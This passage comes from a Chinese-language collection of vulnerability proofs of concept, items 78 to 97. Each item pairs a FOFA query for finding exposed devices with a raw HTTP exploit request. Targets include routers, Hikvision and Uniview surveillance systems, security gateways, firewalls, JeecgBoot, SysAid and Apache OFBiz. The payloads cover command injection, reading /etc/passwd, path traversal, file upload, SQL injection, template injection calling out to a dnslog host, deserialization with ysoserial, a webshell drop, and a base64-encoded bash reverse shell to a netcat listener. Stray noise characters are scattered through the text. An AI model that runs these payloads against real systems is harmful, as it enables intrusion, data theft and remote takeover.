. t7 m- a; P2 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ R9 J" ~0 }& r( Z# Z
Connection: close
* Q5 K& Q9 \9 x* LContent-Length: 336
9 z# y% A3 c7 x* |Accept-Encoding: gzip
. J' n8 o$ u7 Q3 }! D4 uContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l0 X9 \% g% e, ?9 L/ i2 F  w. b

3 G2 M7 E/ G( C  D# |2 \6 I1 R# [: o------YsOxWxSvj1KyZow1PTsh98fdu6l2 u3 F2 t, H3 E* U% n) a8 ~
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"$ ?' |8 W; Q1 X0 B3 A8 D
Content-Type: image/png
% ~# J6 B2 o. z* l9 a2 S4 a$ g4 `5 M* G: t2 r
YsOxWxSvj1KyZow1PTsh98fdu6l) r6 `: j  h4 e
------YsOxWxSvj1KyZow1PTsh98fdu6l
! L$ q. Y( o* T5 x0 |Content-Disposition: form-data; name="target"$ D& d+ e) ^( m/ |3 W7 E: J3 D

- y$ k* A) M( ^) Y% U6 z) L4 ~2 Z* L* z/Applications/SkillDevelopAndEHS/1 Y4 a- z/ D- n  g/ H0 a8 d
------YsOxWxSvj1KyZow1PTsh98fdu6l--% B' K6 f+ s( B6 t1 t

9 ~  x- n1 c' T; L0 a
5 k$ V" ^/ z8 r# Q1 i. S! L4 tGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
6 z3 w; R; W& o3 O5 P2 T6 fHost: x.x.x.x) L3 T" w1 S) x0 X. m

; S3 g5 n7 Q: j/ q& n; }% X8 r/ c3 L% i! _+ f
79. BYTEVALUE 百为流控路由器远程命令执行
6 P8 q& x. |6 ~2 g, EFOFA:BYTEVALUE 智能流控路由器
6 o0 G) c: J4 q; u  sGET /goform/webRead/open/?path=|id HTTP/1.12 {$ D$ z. t: X& k1 ]7 _8 Z; _
Host:IP
- O' K: B& }; G. h* E) S: sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 Y8 i- G1 l9 F& t( n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 I1 w) S" y- H6 q+ H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# v8 T9 P; D1 v4 DAccept-Encoding: gzip, deflate
8 X8 ]! O( t) q8 xConnection: close; ^3 S$ E4 n$ c% v
Upgrade-Insecure-Requests: 17 ]' w! i. O9 W) W& j4 J

, K8 E! B) F5 u2 E% \: C
9 u0 p" w; d7 N" w0 e) J0 N+ c80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传. p/ t0 ~# Y6 M  G; P
FOFA:app="速达软件-公司产品"
" i: q: W; ?, L" e9 |4 U0 c8 ~) G" uPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
: S$ u) [4 ]" iHost: x.x.x.x: U8 m$ X. M! k* e. e+ K3 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* @+ U4 i1 E& V$ Q0 e/ Z# [) y1 nContent-Length: 27
3 k: j3 ?/ ~/ [5 n/ }- WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 U# C+ H9 E! `/ k" Q" G* N
Accept-Encoding: gzip, deflate
1 `3 w6 P( C8 _* s8 kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& y, M7 i& [4 U4 B0 n% g& @
Connection: close
) C$ V$ f- ?! j$ a% Z6 X0 ZContent-Type: application/octet-stream
' Y; P2 r% h3 L0 S: V  UUpgrade-Insecure-Requests: 16 ?; w+ Y3 }% l* {1 T
! }( M2 p7 o. h
<% out.print("oessqeonylzaf");%>% N3 F- q+ \1 _# T8 M6 K  R- b
: H- J) n7 g7 O  a* e
; ~7 J  H# I9 @
GET /xykqmfxpoas.jsp HTTP/1.1- K; c( R" P* u  \" p; W- j: V( u
Host: x.x.x.x7 o8 V! O/ Y" ~5 M6 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* A( U' P+ R+ h9 G/ y8 S1 b! W- NConnection: close; g% k! A3 \/ m1 M% Q& C9 {: L
Accept-Encoding: gzip
/ l- p' i9 O; m3 z( G  Y4 E& S6 z: E- X* v9 v9 [! p
/ D$ T( h* ?1 K% d. P' D+ e7 a4 V
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露# k4 h- b& ?6 g( b6 W- D
FOFA:app="uniview-视频监控"
! E% S7 m' h$ L/ }. [. x1 lGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1, C9 g  e3 x# \% I& X
Host: x.x.x.x! @/ I! D1 {7 L. r. |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. X! @; l- B1 iConnection: close5 N4 h0 T6 y6 n# b" |$ ?0 c) t3 O
Accept-Encoding: gzip2 n0 N3 `# y7 `" ]

$ m( t) W8 v; f. D1 J2 U/ f) m1 F2 f( n; b
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行; ~+ y) q+ x" B
FOFA:app="思福迪-LOGBASE": ?* Z- F1 |; M3 ]' p8 p& v+ b
POST /bhost/test_qrcode_b HTTP/1.1
4 X, B7 {* X- J8 b9 p& HHost: BaseURL
# F: y+ N' T" Z) H8 s, _User-Agent: Go-http-client/1.1
* C4 M5 k; V# L' OContent-Length: 23: I. ]4 P( Z/ m& Y: r( B9 Z$ ]
Accept-Encoding: gzip
: W+ f% c; C. }+ c4 kConnection: close
/ u8 E, ?- q5 ?/ l4 i/ lContent-Type: application/x-www-form-urlencoded
) l' J- h* J6 H1 ?& I( u6 kReferer: BaseURL
9 |% C! K; _/ d$ \- s  I
1 \4 f9 Z2 x# w- T) Nz1=1&z2="|id;"&z3=bhost  H& Q2 b+ Z( ^) ?% B9 Q( I
& a& r% T: g: F# z0 V

3 Q2 k: s: F9 Z83. JeecgBoot testConnection 远程命令执行7 C& U. V) D; S  H7 w. s! `3 W
FOFA:title=="JeecgBoot 企业级低代码平台"
1 K3 P: ]. I5 G+ q! _# U$ T2 \+ n% ?# u
' O( d' N5 b9 @4 B( h
POST /jmreport/testConnection HTTP/1.1
* o6 y5 M! h& @: i% ~! v" u. {. E9 j) QHost: x.x.x.x
# B. x+ C+ u0 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% h# E: n' ~3 e! I6 s
Connection: close
% e% f) s. }2 l! T7 m# y( p! cContent-Length: 8881: ]% {& F2 D$ J2 g3 a! w5 X) V
Accept-Encoding: gzip/ _$ d! j9 w: ?; B* _: ]- J
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
8 \) i( M- \/ U; |$ ~Content-Type: application/json
1 y6 b/ s# |7 p! e' i, ?3 ~' x% `; f6 ]% s/ s
PAYLOAD% |5 B  |4 C2 W

! Z5 c4 q) e+ `& ?84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 o; K4 ]. i5 _. V$ n: {, j* o
FOFA:title=="JeecgBoot 企业级低代码平台"
9 V" d4 c' t4 J5 _3 n
) y0 m- z: V# M3 Y7 o" {5 K/ s* M
1 w, c+ g' r) P! W
( B' u* s0 v6 ~6 V8 a( x; QPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
& R4 Y4 }/ J& @) k- nHost: 192.168.40.130:8080
- S9 }" b% o/ D( I8 V% dUser-Agent: curl/7.88.1. L5 E9 D! q8 S; D) o% M" ^
Content-Length: 156
- W. g$ d+ M" I- u) P/ K8 _# bAccept: */*$ L; J4 _2 z6 N( a8 V+ {* Q
Connection: close
  I7 u; ~- N! o$ y. b7 l& D3 m- uContent-Type: application/json
1 v$ b! y1 [# d+ uAccept-Encoding: gzip
' F5 s1 ^4 o- U$ V$ }) D. `( E) K1 @- L4 j; j8 V# W
{5 r3 y- A( @+ M& V% `% K
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
5 o& J( F$ j4 T, E$ T( r* A; x  "type": "0"4 j% x3 X  j9 Q+ ?, j8 b$ _, J8 K9 x
}, s1 F5 W4 A3 {! _, O; o

4 m) g, l" D/ P$ C: s5 H& w3 U; O$ H7 A2 `, H3 i
85. SysAid On-premise< 23.3.36远程代码执行
0 w  C; j3 l) Z6 [  H; S1 ECVE-2023-47246
$ e, |1 x1 T# ~FOFA:body="sysaid-logo-dark-green.png"
9 F* t& ^" J3 i2 Z! _EXP数据包如下,注入哥斯拉马
1 U9 V9 ]) _$ H  B; EPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.19 x* s7 \: m) R6 S& l
Host: x.x.x.x
  o/ m1 j! p# m2 E( \; VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 c. K0 f. [! T, ~" dContent-Type: application/octet-stream
9 h( c2 h8 I8 N- ]7 \Accept-Encoding: gzip. L  q# [& E' e1 U! R% C
$ l% G4 ]( b2 ~- e
PAYLOAD$ |3 d+ G$ r4 X& `) P" I

' i$ l& v1 j6 x) P+ Q6 L. b回显URL:http://x.x.x.x/userfiles/index.jsp
1 p7 Z1 a0 G4 Y! ?- c  c. s1 @% K/ t
86. 日本tosei自助洗衣机RCE4 Z7 _/ W% m9 [* p) ~- b
FOFA:body="tosei_login_check.php"
+ [1 d/ T$ Y3 }0 G- }1 ZPOST /cgi-bin/network_test.php HTTP/1.1
' F9 L( Z4 o7 B6 x& k- pHost: x.x.x.x6 E/ u* O% O" W( x. @0 U
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
7 Q. @2 M- ^, W; u# PConnection: close. P1 ~, u/ p5 J# a+ r: A8 G
Content-Length: 44: G8 z- c7 H8 [$ D3 }
Accept: */*
; M+ ^6 {! a$ HAccept-Encoding: gzip3 m# c6 ^* J" P* @' ~4 ^3 U
Accept-Language: en
7 u  b7 F) K7 U+ ]) \, ~8 }% g1 [Content-Type: application/x-www-form-urlencoded# f/ I% S) Z( c% V" d0 o
1 I9 A+ z( v* l& i( r# ~  w" p
host=%0acat${IFS}/etc/passwd%0a&command=ping
) T4 r* |% a; U+ x* o$ Z. U: T+ `+ X6 p" |+ a$ o

7 a% z/ I# N( b  k# |87. 安恒明御安全网关aaa_local_web_preview文件上传
1 w! H# Z! z7 K$ V" p/ EFOFA:title="明御安全网关"
( X/ X9 c4 S/ o0 K# U9 QPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1* D$ r- a) L/ F/ O. i2 `
Host: X.X.X.X
7 P  C! [% G4 m1 J! d5 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* v8 ?- c3 ?! y+ @6 W' x- o" G, T* WConnection: close$ y% j$ W  I; _' O3 ]5 S
Content-Length: 1981 l/ `0 R$ l2 l+ Y0 t+ W% A! R
Accept-Encoding: gzip% P& p/ Q0 o8 T9 U
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
) n" l5 w  _: |/ D0 R) _/ w1 K# W6 l: z* L' i
--qqobiandqgawlxodfiisporjwravxtvd
4 R! q6 p: J* H, A/ Z* [Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
5 m9 y( r# y  z& FContent-Type: text/plain, x! d  e! w  D, ]- A+ A2 I6 D
: Q! P+ e- ^5 Z+ g" y3 L5 i  S$ t2 ]
2ZqGNnsjzzU2GBBPyd8AIA7QlDq$ C  S3 e* f/ i# @$ k" M0 j
--qqobiandqgawlxodfiisporjwravxtvd--  T) }2 p' P) K6 {" x0 ?% o
. v9 R3 J4 E. `' Y# J

% H( n. w7 I6 I$ p1 b1 A6 C& P9 Y7 s/jfhatuwe.php
3 f% F+ M0 `4 P! G) X& f' Y* X0 k
' z& |' v7 i- w  }5 {3 d88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
. r2 C( }1 G: X! P. kFOFA:title="明御安全网关", b, Q& l+ A, n* k5 k8 t' s0 s
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
# g" Y* D7 N3 r- ~. OHost: x.x.x.xx.x.x.x3 S( q; r6 `  q% ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 s0 u, s- N5 d- _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ T( Y/ i% X# V( N9 M$ `Accept-Encoding: gzip, deflate
+ D7 L. v, V, q8 l5 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* S# c9 M4 b0 J- g" Y7 eConnection: close
# E$ K6 i( V5 {2 U* p& U4 }% d+ ?5 C. O( E- w! u# B
* F& E+ R9 G- b$ t" u6 f
/astdfkhl.php- X$ O2 V' S  l: j: X7 F, N1 j

9 T% H( L3 \- {8 A2 q9 v* V7 t( u89. 致远互联FE协作办公平台editflow_manager存在sql注入
2 ^$ Z+ Z) B3 {" _FOFA:title="FE协作办公平台" || body="li_plugins_download"9 O! s' z/ A2 ?( f
POST /sysform/003/editflow_manager.js%70 HTTP/1.14 P* k* B/ R' j( z2 r# f8 k
Host: x.x.x.x
% v4 e- m0 n- i0 i& y6 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- H# v# T1 I) e9 l0 HConnection: close8 m$ L" M1 r5 b" Y; a, R) b2 }: B
Content-Length: 41  }4 `/ ?8 Q1 s9 R/ {9 i  T
Content-Type: application/x-www-form-urlencoded
; x2 {' w- a; ]2 x' C& o$ LAccept-Encoding: gzip
' h2 q5 C2 z8 g( Y: b. ]9 U$ u* [3 G: y; Q9 j! U* h& A" }
option=2&GUID=-1'+union+select+111*222--+  \. c; _- s/ E/ `

( A& h/ r  r" x7 T0 v7 K1 B% u
: I& B5 J4 H5 R; e3 ?4 B9 C90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
( L. {( r9 S( y4 yFOFA:icon_hash="-1830859634"% h# M& C* T% y3 p8 w2 p: u, B
POST /php/ping.php HTTP/1.1
& j/ {' W8 b( G: g4 @0 W( i' u& wHost: x.x.x.x
9 L5 v% E' K: F5 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.05 u5 C( A8 v4 V' e: G
Content-Length: 51
" b: e4 }) {% \8 W( qAccept: application/json, text/javascript, */*; q=0.01
6 }% K; u! ^) v6 Q! sAccept-Encoding: gzip, deflate
" f3 ]) _9 ?: @/ C4 Z. }& EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ e3 I  ~! ^3 J2 r0 F
Connection: close
8 b) e. A" l7 e7 |; _6 BContent-Type: application/x-www-form-urlencoded4 m5 U/ |2 ~  U6 y1 y4 D
X-Requested-With: XMLHttpRequest
# K7 i0 z! O$ e- D( W6 Y- `
/ s+ i4 e7 f* k4 ?. f5 Y6 L, t7 tjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
, E& D! f9 T9 `4 s
, |/ T0 L7 l+ t+ M4 d3 V$ }- `$ N) p( Q' Y1 H" g
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
! z- n, y$ R* i/ z) C  EFOFA:title="综合安防管理平台"% b8 A+ w0 F( d# b4 D8 G
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1, Y1 Q: z- P2 A" k4 r& m
Host: your-ip
# I, J- T5 W' J0 S' g+ B5 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" [5 R' W7 d/ B& @# w$ {
Accept-Encoding: gzip, deflate$ `+ V/ A* w$ W+ u$ _9 s3 u) f7 o" t
Accept: */*
+ m( S. i. V- Q% V3 p6 Z8 t$ w) _& F/ @Connection: keep-alive
" {7 I0 @+ e. ^3 v1 \6 i* D3 o$ _  E/ b
: b. g% N2 S: ~

* O6 q& l( L( P# |92. 海康威视运行管理中心session命令执行
+ E4 }, F6 e  x' f* V1 ZFastjson命令执行
1 t" y8 ^/ Y& k$ c5 ohunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"* |/ O3 _4 t% w8 T/ n' b9 t
POST /center/api/session HTTP/1.1
2 L: \$ r: ?" o0 {: G4 r; ~: bHost:- ], t+ K# L# y' w
Accept: application/json, text/plain, */*) [9 f9 \6 m  \; A- d2 z8 r( F" s
Accept-Encoding: gzip, deflate
0 G: c4 K4 C! u4 ]/ a' S3 o( _- |X-Requested-With: XMLHttpRequest
3 H( G% C& _  z% H0 q4 V0 |Content-Type: application/json;charset=UTF-8( _; c1 o! p' b6 J) L9 ?2 a( e4 P
X-Language-Type: zh_CN
  C5 T7 R" K) H& L( m0 d% c, h+ wTestcmd: echo test
6 v/ w, I* n' S& f$ W6 C+ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
+ q5 R5 d4 H7 U" Y" }- \, Q! _$ }Accept-Language: zh-CN,zh;q=0.9
+ a, X  G& V  c3 Q1 sContent-Length: 5778! w6 k% Q6 ^- O6 x3 Y  Y* v

) I- u! \5 A) C' HPAYLOAD( T% z# p% L. u; f9 a6 L( v

+ c. p2 b- p) S3 F* C( `! l1 Q- u* j3 D: h' v$ c1 b
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
* L/ a3 h& h) s! v/ e% BFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
6 f0 o* T" t; C6 {POST /?g=app_av_import_save HTTP/1.1- a# Y) N3 V# w8 }4 A
Host: x.x.x.x' y. B3 D" G: c* s6 f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
8 a# i) ?. a% H9 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" R; I8 ?# ~' V& t" B' U" B) p
( q0 g/ D$ B' F" C% J: h& p------WebKitFormBoundarykcbkgdfx) ~7 m  n# ?2 j8 P+ c
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1 G4 m% A* p+ S% A! V4 O& K
; ~2 W& N, ?! {# B) x2 z2 g% l3 C: ~10000000
; M3 [2 V  l. {& l0 v: p7 j------WebKitFormBoundarykcbkgdfx# U5 K2 u4 h! r; A& C
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"( k- y' w3 ~3 g( q9 v; \: q
Content-Type: text/plain3 \' `* Q: v7 l& Y( P; |
4 X" [  z" `$ m8 Q
wagletqrkwrddkthtulxsqrphulnknxa
  C2 p7 v! C( E2 c! D6 @. F------WebKitFormBoundarykcbkgdfx
" ?* g2 l( a5 ?! x' F- c6 aContent-Disposition: form-data; name="submit_post") Z! n: T5 [, J! |% q# V" P
8 N$ D8 X% {# k, S9 B! K
obj_app_upfile5 P/ w' W3 k* E9 ?' x$ i0 L4 d( x
------WebKitFormBoundarykcbkgdfx
; V+ @9 g4 W! q) XContent-Disposition: form-data; name="__hash__". w4 _' [( r  U4 V1 v2 Q4 G

/ u+ ^' H! Z- H9 z( _0b9d6b1ab7479ab69d9f71b05e0e9445
8 X' @, H: H) y9 c( T------WebKitFormBoundarykcbkgdfx--
% R) v' n# c% t; k% D
& D2 c+ }5 P. p
* m5 q" L& `" W0 @* }. r' VGET /attachements/xlskxknxa.txt HTTP/1.1
* W; w- w0 Z6 H0 Z, bHost: xx.xx.xx.xx4 }* z3 a2 r- T* V8 _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 z- t6 Q; W$ w! |, B$ e
9 Q  H( n( d5 D- s$ U
3 ^' }$ C$ N  H4 R3 W$ Q* P; a
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传% U% S, x' m0 }% }' {1 v
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": s+ Y7 o2 h7 p* x# p: r$ _! i3 t
POST /?g=obj_area_import_save HTTP/1.1
) N; c. O0 l  ~& B. _$ JHost: x.x.x.x) o5 z, P, j( _, s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
8 |8 p$ R0 f* k$ t+ O9 J1 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ q. Z' Z, F4 o& H) |& I( W! i/ U8 t+ h+ i1 M
------WebKitFormBoundarybqvzqvmt
  I7 n5 w3 }1 e' N$ XContent-Disposition: form-data; name="MAX_FILE_SIZE"
% g! r- H4 t/ N* j, K, b) i6 d) ]9 [8 l! R1 A8 B
10000000
1 {8 n9 }: I. Z  G0 d" _------WebKitFormBoundarybqvzqvmt
- K7 T6 R+ l& T  J6 g; yContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
" g/ i8 y) z3 s5 I9 hContent-Type: text/plain, c+ k; V! b3 d5 n

( q9 T) s0 }% E2 z7 Zpxplitttsrjnyoafavcajwkvhxindhmu
4 n9 I4 V- p7 z------WebKitFormBoundarybqvzqvmt% c9 F! J' u0 m/ c4 A
Content-Disposition: form-data; name="submit_post"
; e! B$ Y+ W$ w) s6 f3 C- K+ Q" L
2 z1 B0 g. i  b) iobj_app_upfile  x' O' t; P+ p0 L  o& |7 K
------WebKitFormBoundarybqvzqvmt
8 C; w0 D* V7 ]7 e* B2 [Content-Disposition: form-data; name="__hash__") v9 r% `9 Q# g# j* U% o
6 x+ n+ B  W# j; H1 m" A
0b9d6b1ab7479ab69d9f71b05e0e94451 o" S& g7 ^+ I: q
------WebKitFormBoundarybqvzqvmt--0 i2 f/ V, Q7 m) z& g
: b$ d- F$ K( y+ R1 s. Q5 M

1 e8 P5 ~1 O+ S5 n8 {3 J0 r) q4 n: {9 y" c3 d
GET /attachements/xlskxknxa.txt HTTP/1.1+ u/ t8 p$ s8 h
Host: xx.xx.xx.xx
# B1 x1 c  r3 ^, aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& ^3 I, u) l$ N. b. o# G" A9 \. |# C7 t
* s+ \# \/ C: X/ n+ n5 r5 |9 D
' A9 P* B" f: w8 u( R2 o
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行" |1 m  m0 v' s
CVE-2023-49070  T5 q2 @, O9 a
FOFA:app="Apache_OFBiz"
+ s; ^  M2 g% S- xPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: G  G, H4 n( gHost: x.x.x.x
' |; n+ K! [# ~# W. [3 m( EUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( u+ D; f4 N, T* h; M% fConnection: close
: i7 m* r+ E1 `' r; _Content-Length: 8897 S; y# [3 q! [6 Y
Content-Type: application/xml
! ]2 b( Q" b* @# p, w  f& CAccept-Encoding: gzip
4 M8 S3 m9 k& `( R4 k6 L* V6 @  c  G8 h9 W. ^
<?xml version="1.0"?>. e; `* d# f# V
<methodCall>* l, E+ S5 K$ X- @! o
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>" \9 `, I$ N5 \  G+ X3 a/ q* G7 P
    <params>5 s! \- ~& Y9 H6 w
      <param>& l) {  f* x: j+ @
      <value>
* M$ W1 i7 S# \( S7 m        <struct>1 d, v2 I) m0 ^' Z; j, `! Q2 G
       <member>
5 l0 Y! l9 ~0 o* Q          <name>test</name>6 Z5 u4 B5 f* \3 l, O, k
          <value>
$ o" m2 Y, t/ A$ q8 [      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
5 O! {8 I0 L/ f          </value>0 o1 U2 w, R4 w1 _
        </member>9 D' b, ^& J. E4 ~7 c
      </struct>
. S( S) b3 h) s/ p4 i      </value>
: K) {' t5 D- N; C' W2 m    </param>
1 H$ {5 J. I4 w- o8 s; B$ Z; w8 I    </params>
) D0 H4 Z3 f$ h# w</methodCall>& r+ q! W  R, j( @, E

1 v6 f6 k5 z8 Q) V1 U$ p
/ v, W# {$ h5 n/ v, J' ~用ysoserial生成payload
5 v- @8 P1 ~% C3 |( q, u# ijava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"$ ~% V) X! I" J4 T. k! _1 ?
7 q2 R3 v7 h% u

9 D+ E% }# {" X: K. E2 y将生成的payload替换到上面的POC
+ V( |7 o* ^# |6 l3 ?# R" xPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1* M- K! Q' b, Y7 L7 g% T
Host: 192.168.40.130:8443. L) u, P. ~' m/ `( G2 G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( Z: |9 F$ w2 K  o8 Y' cConnection: close8 _7 l8 F' @0 M+ t# g6 j
Content-Length: 889: y0 V  J' `5 f3 h  b- R! ?
Content-Type: application/xml! o/ Z/ i8 K9 D! ]+ f+ ]: ^% v
Accept-Encoding: gzip  Q  ]( I/ H3 X

! P, b& t/ Y- q: N$ W- nPAYLOAD6 \7 Q6 _# R% y5 G

% A3 \( m6 Y  O- P- `: Q0 Q96. Apache OFBiz  18.12.11 groovy 远程代码执行; v5 \9 [7 a$ Y! m5 }3 M; C& m
FOFA:app="Apache_OFBiz"
& {0 P5 W2 h: `) x/ E. R* `0 ^POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
2 n1 ]7 i- w) A, _Host: localhost:8443
) ^1 u( o0 ~3 o) z" uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ P' |* G4 u$ y& e
Accept: */*
. D7 ?+ q' m" W' l5 V; z# EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 f% x9 a, i0 I1 h% W& L
Content-Type: application/x-www-form-urlencoded! N/ T. h* P1 e% D
Content-Length: 55/ {. [- A6 F8 {! x

9 @, e0 k) u: h1 X/ T/ JgroovyProgram=throw+new+Exception('id'.execute().text);2 E- A: D! K# q0 ?3 _
' q& G, H1 N$ W$ H8 A3 l
# ~0 K# w& V( _3 i) d
反弹shell& }' S* ], \' {$ u3 }- d# J
在kali上启动一个监听
- i9 h% s3 X& \2 onc -lvp 77771 \% ~, V' e8 J: g  s* c

% y8 T1 n. _5 v  q+ a, KPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
$ f- |3 v4 v. w- _( v: DHost: 192.168.40.130:84435 g" I2 j& g- \, H/ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 {& V& [" D8 ?* W& d" d* U
Accept: */*
) c. @# j3 m$ x% n! k) bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ B3 j, `  V4 a( x8 U% v- ~" X: ^Content-Type: application/x-www-form-urlencoded* {  I- y6 _( c" i; {. Y) j3 X, Y
Content-Length: 71: T  J, L% E1 P2 S7 [9 S$ c4 K3 R
* w5 o) m9 b* z
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();0 f$ _! g& u7 z- a
' P# ]" f, U; r) p
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
